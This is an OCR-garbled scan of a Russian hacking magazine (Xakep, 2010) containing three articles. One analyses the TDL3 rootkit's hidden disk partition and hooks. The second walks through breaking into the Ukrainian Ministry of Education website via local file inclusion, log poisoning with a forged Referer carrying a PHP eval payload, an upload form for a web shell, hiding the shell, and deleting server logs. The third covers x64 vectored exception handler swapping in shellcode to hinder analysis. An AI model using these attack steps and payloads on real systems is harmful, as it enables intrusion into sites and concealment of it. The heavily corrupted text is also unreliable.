(портов жестких дисков) принимают только 
запросы на чтение/запись секторов и вспо- 
могательные запросы от диспетчера РпР 
и связанные с питанием. Тот же аіарі.зуз 
в незараженном состоянии обрабатывает 
сгеаіе/сіозе запросы, просто возвращая 
5ТАТи5_51бССЕ55. 

Дело в том, что руткит резервирует часть 
диска (в его конце) под область, где он 
будет хранить свои файлы, например, 611, 





НАЧАЛ О ХВОСТА РУТКИТА В ПА- 
МЯТИ (ТАК ЖЕ ВЫГЛЯДИТ И НА 
ДИСКЕ) 



которые он инжектит в процессы, а также 
сам хвост. Там он организует свою ФС, но 
самое интересное, что руткит монтирует 
ее на объект \Беѵісе\І бе\І бе РогііХ, обраба- 
тывая таким образом запросы на чтение/ 
записи к файлам, которые поступают как 
из самого руткита, так и из его юзермодной 
части. Например, сам хвост может обра- 
щаться к своей ФС для чтения конфигура- 
ционного файла. ѴЕ5 подробно расписана 
в ѵѵбііе рарег БгѴѴеЬ, поэтому я не буду 
повторяться, а предоставляю тебе возмож- 
ность изучить это самостоятельно. 

Для обращения к файлам в разделе рут- 
кита нужно знать уникальную сигнатуру, 
которую он хранит по смещению 0x254 
структуры (БігЗідпаБге). Полный же путь 
формируется как (Б і гЕи ІІРаЕЬ) имя_драй- 
вера_порта + сигнатура_каталога (на моей 
машине выглядит как \Беѵісе\І бе\Ібе РогЕ 1 \ 
гіуиісѵр). 

В силу того, что руткит виртуализует доступ 
к своим файлам, ѴѴіп32 АРІ вполне спо- 
собны открывать файлы типа \Беѵісе\Ібе\ 
ІбеРогіИѴіуиісѵрДбІѵѵзр.бІІ. В одной из вер- 
сий руткита, очевидно, произошла ошибка, 
и би, которую руткит должен был удалить 
из РЕВа, оказалась видна. 

ТЕХНИЧЕСКАЯ НАЧИНКА 

Теперь посмотрим на то, как хвост прово- 
дит подготовительные действия инициа- 
лизации. После того, как руткит открыл 
драйвер-порта на диске, он ищет его 
объект-устройство с флагом РІ БЕ_Б ЕѴІ С Е_ 
СОМТРОПЕР, к которому будет при- 
монтирована его Е5. Далее производит 
полную инициализацию своей структуры 
и заражает драйвер в памяти, кроме 
того, составляет карту секторов и смеще- 
ний драйвера-порта, которые он должен 
скрыть (массив НібеАгеаЕпІту). 

Для затруднения анализа руткита при 
установке саІІЬаск-функций он рассчиты- 
вает смещения до этих функций, вычисляя 
дельту, а затем вычитая из нее значение 
до получения требуемого смещения. 

Чтобы найти ссылку на функцию, нужно 
сделать обратную операцию вычитания 
дельты из смещения и затем найти ее 
простым поиском. В моем примере функ- 
ция вычисления дельты выглядит так 
(смотри картинку «Функция вычисления 
дельты»). Например, ты нашел функцию 
завершения и хочешь узнать, в каком 
месте кода она регистрируется. В при- 



► 056 



ХАКЕР 03 /134/ 10 







4Й> ГоЬ^есЕ ЧгігічезЛаСарі 

аі357БЛ8 туре: (аі9ЬВ0ВВ) Огіѵег 
РИдесСНеагіег: 819Б75Э0 (оігі иегзіогО 
напгііесоипс: о Роіпсегсоипс: 11 
аігесСйгу Ой]есЕ: еі 019995 капв: аізрі 
\кёУ п роі(РРОР031!В)*аС 170 01957548+38 



СНЯТИЕ ХУІ^/в ДРАЙВЕРЕ- 



ПО 



ПО СМЕЩЕНИЮ 0X384 ОТХВОСТА, 
РУТКИТ ПЕРЕДАЕТУПРАВЛЕНИЕ 
ОСНОВНОЙ ЧАСТИ 



НАЧАЛО ОСНОВНОЙ ДИСПАТЧ- 
ФУНКЦИИ 



ЗАДАЕМ СМЕЩЕНИЕ ДЛЯ ЗАГРУЗ- 
КИ ФАЙЛА 



Ргосезжг (дое 

(п*еІ80кЗ$ рткеногс «чіарс 



^мбіпд ндщніі 
!_МСЬіОЯЙМ* 



ОрЙоги 

0р«йе идгічлі? 

0 104СІ эі ккіе мятаіі 

1 Йегнп» ОН вп(й« 
□М»ВДІЗоагі 

0 га ів^говп* о*р* 

!_; Цифд ор&ю* 

1 ] ОЫе ПАТ #оцр 



вдатви. &#т ■інсіо-.ѵ-і 



Алаіігаз 

ѲіпаЫвгі 

В>п(ііміо.ег»эЬЫ 



І_оагі л пе-ет Ше 



5ед000:81987528 








; 8а243384 






5Ѳд000:81987528 














5 ед 000:81 98 7528 








^пСаІсОеІГа 


ркос 


пеаг 


50^000:81987528 














50 дѲ00:81987528 


000 


Е8 


00 


00+ 


саіі 


$+5 


5едѲ00:81987528 


000 


00 


00 








5ед000:8198752О 


004 


58 






рор 


еах 


5едО00:8198752Е 


000 


20 


А9 


41 + 


5ЫЬ 


еах„ 0Р77441А90 


50дѲОО:81987533 


000 


СЗ 






геіп 




5ед000:81987533 














5 ед Ѳ О 0 : 8 1 98 7 5 3 3 

ПДЙ.П4 ЛДЧ 1- «I 








ЕпСаІсОеІіа 


епсір 





ФУНКЦИЯ ВЫЧИСЛЕНИЯ ДЕЛЬТЫ 



мере ее адрес 8198АСА2. Тогда 8198АСА2- 
8а 243384= Р77479 1 Е. Нажимаем <АІТ-В> и 
вбиваем адрес в обратном порядке, то есть 
1Е 79 74 Р7. Функция же обработки всех 
ІРР является достаточно простой, особенно 
если знать формат главной структуры рут- 
кита. Она выполняет несколько целей: кон- 
тролирует скрытие данных раздела руткита, 
скрытие зараженного аіарі и обрабатывает 
функции ѴР5. Итак, если диапазоны 



не заканчиваются. Для сокрытия данных 
на чтение он перехватывает ОгіѵегЗіагНо- 
функцию в 0ВІѴЕВ_0ЕиЕСТ. Если ты слы- 
шал, эта функция используется для построе- 
ния очереди ІВР-пакетов, с последующим 
извлечением их оттуда. Диспатч-функция 
вызывает ІоЗѣа гЕРаскеѣ, что в свою очередь 
приведет к вызову функции Зѣа гі: I о , которая 
перехвачена руткитом. 




ЗАНУЛЕНИЕ ДАННЫХВ БУФЕРЕ, 
ЕСЛИ В НЕГО ПОПАДАЕТ ЧАСТЬ 
ОБЛАСТИ ДИСКА, СКРЫВАЕМОГО 
РУТКИТОМ 



Если клиент пытается читать скрываемые 
сектора, руткит устанавливает свою функ- 
цию завершения, в которой фильтрует 
данные, т 



адресов совпадают со скрываемыми, 
руткит устанавливает свою функцию 
завершения, в которой будет фильтро- 
вать данные. В функции завершения 
руткит вначале проверяет диапазон 
секторов для скрываемого раздела и, 
если есть перекрытие, зануляет данные 
в буфере. 

ПОСЛЕДНИЕ ВЕРСИИ 

Более поздние версии ЮІ_3 дополнены 
функционалом, который позволяет обхо- 
дить антивирусы и антируткиты соответ- 
ственно. В версии, следующей за вышео- 
писанной, используется несколько другая 
техника перехватов. Диспатч-таблица 
функций аіарі остается нетронутой, но рут- 
кит создает Іаке-объект драйвера со своими 
диспатч-функциями и перезаписывает ука- 
затель в устройстве, которое обслуживает 
загрузочный диск, на свой драйвер. На этом 
возможности столь продвинутого руткита 
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взлом 



САЙТЫ 

ПОД УГРОЗОЙ ВЗЛОМ САЙТА 

МИНИСТЕРСТВА ОБРАЗОВАНИЯ И НАУКИ 
УКРАИНЫ 

В ПОСЛЕДНЕЕ ВРЕМЯ МНЕ ВСЕ ЧАЩЕ ПОПАДАЮТСЯ УЯЗВИМЫЕ 
ГОСУДАРСТВЕННЫЕ САЙТЫ. А ПРИЧИНА БАНАЛЬНА: САЙТЫ ДАЖЕ ТАКОГО 
УРОВНЯ ПОРУЧАЮТ ПИСАТЬ НЕПРОФЕССИОНАЛАМ. ЗА СОСТОЯНИЕМ 
САЙТА НЕ СЛЕДЯТ. САППОРТ ЕМЕЙЛ НЕ ПРОВЕРЯЕТ. АУДИТ БЕЗОПАСНОСТИ 
СЧИТАЮТ РОСКОШЬЮ. ХОТЯ НА САМОМ ДЕЛЕ ЗТО НЕОБХОДИМОСТЬ. 



С мысл этого взлома не нажива или 
выгода с залитого шелла. Хочется 
показать, насколько бываютуяз- 
вимы сайты высочайшего уровня. 
Казалось бы, защита их должна быть 
на первом месте, ведь нетрудно представить, 
что за собой влечет взлом государственного 
сайта. Что, если проникнуть в локальную сеть 
и получить доступ к компьютерам, на которых 
хранится информация, например, о внешнем 
независимомтестировании (в случае сайта 
МОН Украины)? Что тогда? Возможно, будет 
под вопросом подлинность сертификатов, 
которые требует каждое высшее учебное заве- 
дение? Поспешу успокоить: делать я этого не 
стал, а обо всех ошибках сообщил на электрон- 
ный адрес поддержки сайта. 

ВЫБИРАЕМ ЖЕРТВУ 

Не знаю, как тебе, а мне легче искать уязвимо- 
сти под какую-нибудь веселую музыку. Включаю 
ОізТигЬесІ — РеНесТ ІпзапіТу и открываю Гугл. 
Вбиваем запрос «міністерство» и видим ни 
много, ни мало 15400000 результатов. Открываю 
первую ссылку и попадаю на сайт Министерства 



образования и науки Украины. Сразу бросилось 
в глаза, что сверху надпись «ТЬе оГГісіаІ зіТе 
2004», а новости — свеженькие. «Давненько не 
обновлялись», — подумал я и пробежался мыш- 
кой по менюшке, смотря за статус баром. Все 
линки вида ШрУ/зііе/сІіг . Возможно, настроен 
тосІе_геѵѵгі1:е, но после клика по ссылке увидел 
в адресной строке: ЬНрУ/ѵѵѵѵѵѵ.гттоп.доѵ.иа/таіп. 
рЬр?диегѵ= 2 по . Попробовал на раскрытие путей, 
заменив параметр «диегу» на «диегуО», но не 
тут-то было: ошибка не вывелась, хотя верстка 
явно поехала. Либо выключен вывод ошибок, 
либо уязвимости тут просто нет. Я чувствовал, 
что все же уязвимость есть, и решил проверить 
на НРІ. И опять никакого результата. Что ж, 
можно попробовать подобрать путь к корню 
сервера, так как запущенный сканер не нашел 
мне рГіріпГо. Но сначала нужно убедиться, 
действительно ли это І_осаІ Рііе Іпсіизіоп, и 
есть ли возможность обрезать нулл-байтом 
расширение. Я просто попытался заинклудить 
уязвимый файл: 

ЬДЦр : / /тт . шоп . доѵ . иа/шаіп . 

рЩр? диегу =таіп .р1ір%0 0 . 



В результате, страничка начала выводиться 
бесконечное количество раз, образуя пира- 
мидку. Это свидетельствует о том, что уязви- 
мость существует, но пока мы не можем точно 
сказать, удаленный или локальный инклуд. 
Вот еще пример не только І_Н, но и І_ооресІ йоЗ. 
Таким запросом можно запросто «уложить» сайт. 
Быстро остановивши загрузку страницы, я начал 
подставлять в запрос символы выхода из дирек- 
тории. Путь подобрал с третьего раза. Думаю, ты 
понял, сколько там должно быть «../»? 

ГОРВВШЕІІ АНАЛИЗИРУЕМ СИТУАЦИЮ 

Насколько же стало легче заливать шеллы, 
после того как додумались использовать/ 
ргос/зеіі/епѵігоп! Послал Р05Т-запрос с 
поддельным ІІзег-АдепПом и все дела. 
Попробуем и мы: Шр://ѵѵѵѵѵѵ.топ.доѵ.иа/таіп. 
рбр?д иегѵ=. У../. ./ргос/зеТ/епѵігопТоОО . Облом, 
никакого вывода. Но есть же логи апача! 

таіп.р!ір?диегу= /ргос/зеІЕ/ 
М/2%00 

И что же? 



► 058 
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[Зші Ыоѵ 15 07:41:42 2009] [еггог] 
[сііепк 92.249.112.225] сііепі 
сіепіесі Ьу зегѵег сопіідигаііоп : / 

и з г / з Ьаг е / рЬрМуАсІтіп / 

[Зип Ыоѵ 15 08:43:31 2009] [еггог] 
[сііепі 65.55.109.220] сііепі 
сіепіесі Ьу зегѵег сопіідигаііоп : / 

из г / зЬаг е / рЬрМуАсІтіп / рЬрАЬзБем , 
геіегег: Ьіір : / /хххх . из/аІЬит/ 
іЬитЬпаіІз . рЬр?а1Ьит=зеагсЬ&зеагсЬ 
=ге1еазез 

Причем весь лог такой. «Хм, на лог доступа 
не совсем похоже». И правильно, потому 
что здесь только ошибка № 403 — РогЬЬісІеп. 
ІІзег-АдепІ: не пишется в этот лог, но пишется 
Реіегег, который точно также легко под- 
делывается. Главное — найти страницу, 
которая нам бы выдала заветную ошибку 403. 
Пересмотрев лог, становится понятно — 
это рбрМуАбтіп. Проверяем, открыв в 
браузере страницу: ШрУ/ѵѵѵѵѵѵ.ппоп.доѵ.иа/ 
рбрМѵАсІтіп . и получаем нужный нам ответ 
от сервера. Напишем простенький скрипт на 
РНРдля подделки Пеіегега’а: 

<?рЬр 

$зегѵег = 

'212.111.193.189' ; 

$Ыг = ' /рЬрМуАсІтіп/ ' ; 

$еѵі1сосіе = '<?рЬр еѵа1($_ 

КЕ01ШЗТ [еѵ] ) ; ?>'; 

$ЬеаЬег = "СЕТ " 

. $Ыг . " НТТР/1 . 0\г\п" ; 

$Ьеасіег .= "Нозі: " 

.$зегѵег. "\г\п"; 

$Ьеасіег .= "Кеіегег: 

" .$еѵі1сосіе. " \г\п" ; 

$Ьеасіег 

"Соппесііоп: с1озе\г\п\г\п" ; 

$ір = ізоскореп ( $зегѵег , 80); 

іі ( ! $ ір) { ііе ( " [ X ] Соппесііоп 
іаііесі" ) ; } еізе { есЬо "[ ~ ] 
Соппесііоп зиссеззіиі \г\п" ; } 
іі ( іриіз ( $ір, $ЬеасІег) ) {есЬо "| 

~ ] Бака зепбеб! \г\п" ; } еізе { 
сііе ( " [ X ] Еггог Шііі® зепііпд 
ЬеаЬегз ! " ) ; } 

$гези1і = ідеіз($ір, 128); 



іі ( зігроз ( $гези1і , ’ ЕогЫЬсіеп ’ ) ) 
есЬо "[ ~ ] Зиссеззіиі! \г\п"; 
еізе сііе ( " [ X ] ЕаіІеЫ"); 

?> 

Если тебе лень писать скрипт, можешь 
использовать уже готовые автоматизирован- 
ные программы, подойдет любая, например, 
ІпеіСгаск, НИрРЕСі от [х26]ѴОЕАЫО, или обой- 
тись плагинами для ЕігеЕох. 

ЗАЛИВАЕМ ШЕЛЛ 

После того, как мы выполнили запрос, он 
должен записаться в лог. Так как мы замени- 
ли реферер, лог должен принять вид: 

[Ххх Ххх хх хх : хх : хх 2009] [еггог] 
[сііепі хх. хх. хх. хх] сііепі сіепіесі 
Ьу зегѵег сопіідигаііоп: /изг/ 

зЬаге/рЬрМуАсішіп/ , геіегег: <?рЬр 
еѵаі ($_КЕ<21ІЕЗТ [еѵ] ) ; ?> 

Следовательно, при загрузке лога через 
уязвимый скрипт выполнится наш код. 
Проверим в браузере: Ь ЬрУ/ѵѵѵѵѵѵ. топ- 
ору. иа/таіп.рбр?д иегѵ=. У. У. Ургос/зеИУ 
[с!/2%00&еѵ=[5+[а . Свершилось, мы увидели 
список директорий. Пытаюсь залить шелл 
известными качалками типа ѵѵдеі, дер [іпкз, 
[упх, но ничего не получается. Пробую сде- 
лать Ыті-форму для заливки шелла: 



Беру тот же лог с ошибками, вставляю в 
начало файла. Выглядит примерно так: 

<?рЬр/* 

[Моп №эѵ 16 11:14:07 2009] 

[еггог] [сііепі ::1] сііепі сіепіесі 
Ьу зегѵег сопіідигаііоп : /изг/ 

зЬаге/рЬрМуАсішіп/ 

[Моп №эѵ 16 11:14:08 2009] 

[еггог] [сііепі ::1] сііепі сіепіесі 

Ьу зегѵег сопіідигаііоп : /изг/ 

зЬаг е / рЬрМуАсІті п / 

[Моп №эѵ 16 11:14:14 2009] 

[еггог] [сііепі ::1] сііепі сіепіесі 

Ьу зегѵег сопіідигаііоп : /изг/ 

зЬаг е / рЬрМуАсіші п / 

[Моп Ыоѵ 16 11:14:15 2009] 

[еггог] [сііепі ::1] сііепі сіепіесі 

Ьу зегѵег сопіідигаііоп : /изг/ 

зЬаг е / рЬрМуАсіші п / 

[Моп Ыоѵ 16 11:14:18 2009] 

[еггог] [сііепі ::1] сііепі сіепіесі 

Ьу зегѵег сопіідигаііоп : /изг/ 

зЬаг е / рЬрМуАсіші п / 

*/ много возвратов каретки?> 

<?РНР 

/ /АиіЬепіісаііоп 
$1одіп = ""; //Ьодіп 
$разз = ""; //Разз 




. . . ?> 



<іогт асііоп= "Ьіір : / / шуѵу. шоп . доѵ . 
иа/шаіп . рЬр?диегу= ../../.. /ргос/ 
зе1і/іс!/2%00&еѵ=сору ( $_ЕІЬЕЗ [ іііе] 
[ітр_пате] , $_СЕТ [аа] ) ; &аа= . / 
шоп.рЬр" теіЬос!= "роз С " 
епсіуре= "тиііірагі/іогт-сіаіа" > 
<іприі Суре= " іііе" 
пате= " іііе" ><Ьг> 

<іприі іуре= " зиЬтіі " 
ѵа1ие= " Загрузить " ><Ьг> 

</ іогт> 

Спокойно заливаю шелл со своего компью- 
тера и захожу на него, ввожу пароль (никогда 
не забывай ставить уникальные пароли на 
шеллы]. Просмотрев листинг файлов, увидел 
2 пустых файла с названием еггог.рбр и еггог. 
Прекрасная возможность спрятать наш шелл. 



Не стоит объяснять, что строчку из лог-файла 
необходимо повторить много раз. Этим мето- 
дом пользуются часто, так что можешь взять 
на заметку при поиске шелла. Также можно 
вставлять в начало текст лицензий или копи- 
райты движка, на котором стоит сайт. Обычно, 
после того как админ увидит текст лицензии 
ОІМІІ, не задумываясь, он закрывает файл, что 
и надо атакующему. После взлома следует уда- 
лять логи. Слава Богу, у меня хватило прав, и 
я сделал «гт -іТ /ѵаг/Іод/ЬЬрб/». Хочу сказать: 
не стоит ломать сайты, это карается законом. 
Но если ты все же решился, будь «белым» и 
сообщи администраторам о брешах в их систе- 
ме (как сразу сделал я после взлома). Автор и 
редакция журнала не несут ответственность 
за твои возможные противоправные деяния, и 
никакого отношения к ним не имеют, т 
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взлом 



■ ■ Р0064 РООбЛгаМАИ.РУ 




В Ш00ѴѴ8 Х64 УСЛОЖНЯЕМ 

АНАЛИЗ КОДА С ПОМОЩЬЮ ВЕКТОРНОЙ ОБРАБОТКИ 
ИСКЛЮЧЕНИЙ 

НАВЕРНОЕ, ТЕБЕ УЖЕ ДОВОДИЛОСЬ ЧИТАТЬ ОБ ОБРАБОТКЕ ИСКЛЮЧЕНИЙ 
В Х64. А ЕСЛИ НЕТ, ТО ПОЯСНЮ, ЧТО МЕХАНИЗМ СТРУКТУРНОЙ ОБРАБОТКИ 
ИСКЛЮЧЕНИЙ ИЗМЕНИЛИ ДО НЕУЗНАВАЕМОСТИ. ЕСЛИ БЫТЬ ТОЧНЕЕ. 

ЕГО СДЕЛАЛИ СТАТИЧЕСКИМ. НИКАКИЕ МАНИПУЛЯЦИИ С СЕГМЕНТНЫМ 
РЕГИСТРОМ РЗ УЖЕ НЕ ПОМОГУТ. НО РЕШЕНИЯ ЕСТЬ. ПУСТЬ ОНИ ПОКА НЕ 
ОПИСАНЫ. ЗАТО ПРОВЕРЕНЫ ТЕОРИЕЙ И ПРАКТИКОЙ. ПОЗВОЛЬ ДОВЕСТИ 
ИХ ДО ТЕБЯ В ЗТОЙ НЕБОЛЬШОЙ СТАТЬЕ. 



НЕ ЗЕН ЕДИНЫМ 

Могущественный и вездесущий в 32-разрядной системе регистр [!з] 
остался фактически не удел: часть его функций забрал на себя сег- 
ментный регистр дз (например, указатель на ТЕВ в гіпд-3 ныне лежит 
по адресу дз:ЗОЬ, на реб — дз:60Ь]. С каждой процедурой отныне свя- 
зан свой обработчик, эта связь закрепляется в ЕХСЕРТІОМ ОІ РЕСТОРУ 
РЕ-файла. Ну да, адрес обработчика теперь в стеке не хранится, ^з 
использовать не можем, то есть БЕН теряет свою привлекательность 
для применения в защите. То ли дело раньше — регистрация 5ЕН «на 
лету», какие были времена... 

Но БЕН ли единым, как говорится. Один мощный механизм почему-то 
остался не упомянутым в контексте 64-битных ОС ѴѴіпсІоѵѵз. Векторная 
обработка исключений (она же ѴЕН]. О ней ты знаешь по опыту рабо- 
ты с 32-разрядными ѴѴіпсІоѵѵз (один только Крис не раз писал об этой 
вопиющей теме). Если ты не в курсе, или немного выбился из него, 
прочитай статью Мэта Питрека, посвященную 32-битному ѴЕН — 
ѵѵазпп.ги/агбсІе.рбрЗагбсІе^ѵеЬ . 

ТЕОРИЯ МЕТОДА 

Подобно БЕН, ѴЕН позволит нам получать управление при возник- 
новении эксепшена в программе: достаточно зарегистрировать свой 



обработчик (он же хендлер) функцией из пісііі. ВиАсІсІѴесІюгесІЕхсерІіо 
пНапсІІег. 

КСІАсІііѴесЦогесІЕхсерЦіопНапсІІег ( 

ІЛлОШ ЕігзСНапсПег , 

РѴЕСТОКЕБ_ЕХСЕРТІ(Ж_НАШЬЕК 
ѴесЬогейНапсІІег ) 

Большое преимущество векторных обработчиков в том, что они 
выполняются до БЕН. Кто не верит, может посмотреть функцию 
ВиОізраІюЬЕхсербоп в пТсІІІ — что вызывается первым? Внутренняя 
функция РТІрСаиѴесіогебНапбІегз, а потом уже идет работа со струк- 
турными обработчиками. 

А теперь о самом интересном! Как нам, собственно, подменить суще- 
ствующий обработчик? Скажем, в случае, если мы по какой-то причи- 
не не хотим ставить новый вызовом ВиАсИѴесІюгесІЕхсербопНапсІІег. 
Ведь чертовски палевно вызывать функцию каждый раз, когда хочешь 
зарегистрировать обработчик исключений. Неэкспортируемая пере- 
менная в пШ РирСаиоиіЕпІгуЫзІ: хранит указатель на список заре- 
гистрированных обработчиков (в ѴѴіп Хр, в Ѵізіа список по-другому 
называется). Каждый элемент списка представлен некой структурой. 



► обо 
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ИДА — ЛУЧШИЙ помощнике ИССЛЕДОВАНИЯХ 



*0к000 Іп1ітЫШге555рлг(! : ЫСНлг 
«0К001 Кс дгі I плдс Рі 1с Еясс ОрЪ іа г*з : ІІСкг 
*8к002 ВаіпдПаЪиддйй : иСЬаг 
«0*003 ВіеРІеІД : ЦСЬліг 

*0к0ИЗ I плзсЦ з е гкгдск де з : Рос в, 1 ВІЕ 
«8x003 I йРгоСас^ейРгосейс ' Рас 1, 1 ВІИ 
«8x003 ] 5 Іедае у Р*ос е і й ; Роі 2, 1 ВІИ 
«0x003 1 : 1 п«д« Ё ііллп іса 1Ь№ Ь с йСс 0, : Раз 3. 1 Вік 
«6x003 ЗкірРлПсІііпдОссгЭЗРоі'ілдгсІсгс : Ров 4 # 1 ВіС 
*0хв03 ЗрлгеВі*:? : Роз 5. 3 Вііз 

«0Х00В ПиПапИ : РИг64 Ваій 

«0x010 Іпд^ВлссйаіІг^ і Рір§ 4 Шй 



«0x018 Ьйг 
«0X020 РгосезвРАГлпвСвгз 
«0x028 Б иЪЕуз И е пВаН а 
«0x030 Рі-огсззМсор 
«0x038 РлсіР'сЫіОск 
«0x040 А С ІТІшл кБЬіе НРЕг 
«0x048 ІРЕМку 
л Л "1 СгозвРгосеввРІІЦ'і 
і РгасвЕЕ I пчіоЬ 



Р*г€4 _РЕВ_ЬВВ_Ит 
РИг64 _КТВЛ5ЕН_РИ0СЕВЕ_РЯ1МПЕТЕНЕ 
РСр 64 ИйІД 
РЬрИ Ваій 

Р*г&4 _ЛТЬ_СЯШСАЬ_ЕЕСТ10Н 
РИ'64 Моій 
РЫ-Ё4 иа±0 
(ІіоЬ4В 
Рос 0> 1 Віі 

і « івд » і іли 



СТРУКТУРУ РЕВ МОЖНО ПОСМОТРЕТЬ В иѴЕКй 
РУССИНОВИЧА, ПРЕДВАРИТЕЛЬНО ОТКЛЮЧИВ 
ПРОВЕРКУ ЦИФРОВОЙ ПОДПИСИ 



ШІ 

Ші 

^ 



Для удобства назовем ее (по аналогии со статьей Питрека] — 
ѴЕСТОВЕО_ЕХСЕРТІОІ\І_МООЕ64. Ниже приводится частичный 
листинг РиАббѴесІогебЕхсерЕопНапбІег в ѵѵіпбоѵѵз ХР х64: 

риЫіс КДІАббѴесДогебЕхсерДіопНапбІег 
КШАббѴесДогебЕхсерДіопНапбІег ргос пеаг 
Іеа г8, КШрСаНоиДЕпЦгуЫзД 
бтр зЕюгД КДІрАббѴесДогебНапбіег 

КДІАббѴесДогебЕхсерДіопНапбІег епбр 



Іеа г8б, [гбх+2 0Ъ.] 
шоѵ гсх, [гсх+ЗОЬ] 
саіі КДІАІІосаДеНеар 

; выделяем память для узла в куче 

ДезД гах, гах 

шоѵ гбі , гах ; сохраняем указатель на выделенный блок 
памяти в гсіі 

Как видно из дизассемблерного листинга, по смещению 186 (запом- 
ни его!) в структуре, содержащей инфу об обработчике, хранится его 
шифрованный адрес. 

Вид ѴЕСТОРЕО_ЕХСЕРТІОІ\І_І\ІСЮЕ64, полученный по имеющимся 
данным: 

з Д тс Д _ѴЕСТОКЕБ_ЕХСЕ РТ I (Ж_ЖЮЕ 6 4 
{ 

ШлОШ64 т_рЫехДДІобе ; 

ЦШШ64 т_рРгеѵіоиз№эбе; 

ЦЪСЖС б 4 ипктт ; 

РѴОІБ64 т_рДпѴесДогебНапбіег ; 

} 



С 00 Ш 6 

Попробуем применить прелести ѴЕН на практике. Писать будем в 
збеіісосіе-стиле, как и полагается. Для начала, опишу алгоритм. 
Потребуется: 

1. ПОИСК БАЗЫ ЗАГРУЗКИ N1011.011. 

2. НАХОЖДЕНИЕ ФУНКЦИЙ РбАббѴесФгебЕхсербопЕІапсіІег, РПЕпсобеРоі^ег. 

3. РЕГИСТРАЦИЯ СВОЕГО ОБРАБОТЧИКА, сохранение указателя на область памя- 
ти, где содержится обработчик. 

4. ПОДМЕНА АДРЕСА ОБРАБОТЧИКА. 

Базу загрузки пісЛІ ищем через РЕВ: 

шоѵ гсх,дз: [ б 01л ] ; указатель на РеЬ в х64 располага- 

ется по новому адресу 
шоѵ гсх, [ГСХ+18Д.] ; РЕВ_ЕВК_БАТА 

шоѵ гсх, [гсх+ІОй] 

; РЕВ_ЬВК_БАТА . ІпЕоабОгбегМобиіеЬізД 
шоѵ гсх, [гсх] 

шоѵ гЬх, [гсх+ЗОЬ.] ; пДбІІ.бІІ Ьазе 

А поиск необходимых функций выполняем через разбор таблицы экс- 
порта пДсІ И. Здесь его не привожу, полная реализация кодеса прилага- 
ется к статье. Функция у нас не одна, а значит, лучше свернуть имена 
в хеш простым алгоритмом: 

1таз]л_зДг : 
ризЬ. гбх 
ризЬ. гзі 
зиЪ гах , гах 
шоѵ гзі, гбх 
зиЪ гбх , гбх 
пхД : 



Сама структура, в целом, немногим отличается от той, что дана в ста- 
тье Питрека (о 32-битном ѴЕН). 

Обратимся снова к анализу РбрАсІсІѴесІюгесІНапсІІег. На самом деле 
вызов ЫЮиегуІпГогппаЕопРгосезз и последующий ксор адреса обра- 
ботчика здесь не что иное, как функция РДЕпсосІеРотТег, вставленная 
в код оптимизирующим компилятором. 

А теперь о замене адресов обработчиков «на лету». Это можно сде- 
лать, потому что РбАсІсІѴесІюгесІЕхсерЕопНапсІІег возвращает ука- 
затель на выделенную структуру ѴЕСТОРЕВ_ЕХСЕРТІОІ\І_І\ЮОЕ64. А 
значит, чтобы подменить хендлер динамически, нужно: 

1. зашифровать свой новый обработчик с помощью функции 
РиЕпсобеРоігіІег (адреса ведь не хранятся в открытом виде); 

2. записать шифрованный РНЕпсосІеРоіпіег-указатель по смещению 
18Гі в ѴЕСТОРЕО_ЕХСЕРТІОІ\І_І\ЮОЕ64. Смещение, надо сказать, 

не поменялось вплоть до Висты, так что юзаем с чистой совестью. 



сіб 
ІобзЪ 
стр аі , ай 
3 е сіп 

абб бх , ах 
гоі гбх, 14 
3 шр пхД 
бп: 

шоѵ гах , гбх 
рор гзі 
рор гбх 
геД 



В качестве параметра передаем в гбх указатель на строку с 
именем функции и, в конце концов, регистрируем свой хенд- 
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► обі 




Егісідешнс ім Вгѵіадг 



<іл уеы Рі п и пі пап? ипІЛЕІіІгд ей* ѵ*гІтп шг*І*іі хмЁНйО |Ме Шш] дрі 




и ип в йиіМплррІпді і« іиЕвваТій ипраскігз 




и ЦП в йиаМплррІпді і« л*ар» аиЕвваТай; ипрасклгз 



НА САЙТЕЖУРНАЛАІЖШРОРМЕВТЫ НАЙДЕШЬ 
СТАТЬИ ПО ОБРАБОТКЕ ИСКЛЮЧЕНИЙ В ѴѴШ00ѴѴ5 
Х64 И МНОГО ДРУГОЙ ПОЛЕЗНОЙ ИНФЫ 



лер (ЬпсІІг0 1 ). Тут же заменяем «вручную» его адрес на другой 
(Ь псі Іг02] . Затем мы вызываем исключение привилегированной 
командой гсітзг (чтение машинно-зависимого регистра], и после 
этого будет вызван не ЬпсІІгОІ (первоначальный обработчик], а 
Ь псі 1г02. Код, демонстрирующий сказанное: 



шоѵ гЬх,гзр 
зиЪ гзр, 4*8 

шоѵ гсЬс, оббзеб ІтпсІІгОІ 
шоѵ гсх, 1 ; бігзб_Ъ.апс11ег 
саіі дугогсі рбг [гЪх] 

; КбІАббѴесбогебЕхсербіопНапсІІег 
асісЗ. гзр, 4*8 ; восстанавливаем стек 
ризЬ. гах ; сохраняем указатель на наш ѴЕСТОКЕБ_ 
ЕХСЕРТІ(Ж_ЖЮЕ64 
зиЬ гзр, 4*8 

шоѵ гсх, оббзеб Ъ.пс11г02 

саіі дугогсі рбг [гЬх+8] ; КбІЕпсосіеРоіпбег 

асісі гзр, 4*8 

рор гбі ; гсіі -> РѴЕСТОКЕБ_ЕХСЕРТІОЫ_ЖШЕ64 

; сохраняем адрес обработчика Ь.пб1г02 

шоѵ [гсИ + 181т] , гах 

; вызываем исключение 

; срі = 3 => ехсербіоп 

гбшзг 



Понимаешь, в чем суть? Достаточно единожды вызвать 
НіІАбсІѴесІюгесІЕхсербопНапсІІег и установить хендлер, а дальше 
можно менять динамически адрес обработчика! От нас требуется 
только хранить указатель на ѴЕСТОНЕП_ЕХСЕРТІОІ\І_І\ІСЮЕ64. 

То есть, фактически потеря іа скомпенсирована (ну, почти]. Этим же 
способом мы можем добавить в список новый обработчик, не вызы- 
вая РіІАббѴесІюгебЕхсербопНапсІІег. 

ОТСЛЕЖИВАЕМ ВЫПОЛНЕНИЕ 
ѴЕН-ОБРАБОТЧИКОВ 

Представим на минуту, что нам пришлось исследовать код, хитро 
манипулирующий с ѴЕН, как описано выше. Не скажу, что динами- 
ческая смена обработчиков сильно затруднит отладку (но не ста- 
тический анализ!], так как отловить вызываемый хендлер можно 
через функцию ПиОізраТсЬЕхсерТіоп. Правда, она неэкспортируе- 
мая, но есть экспортируемая функция ННПаізеЕхсербоп, из которой 
вызывается РиОізраТсЬЕхсербоп. 

іпб базбсаіі КбІКаізеЕхсербіоп (збгисб _ЕХСЕРТІОЕ_КЕСОКБ 

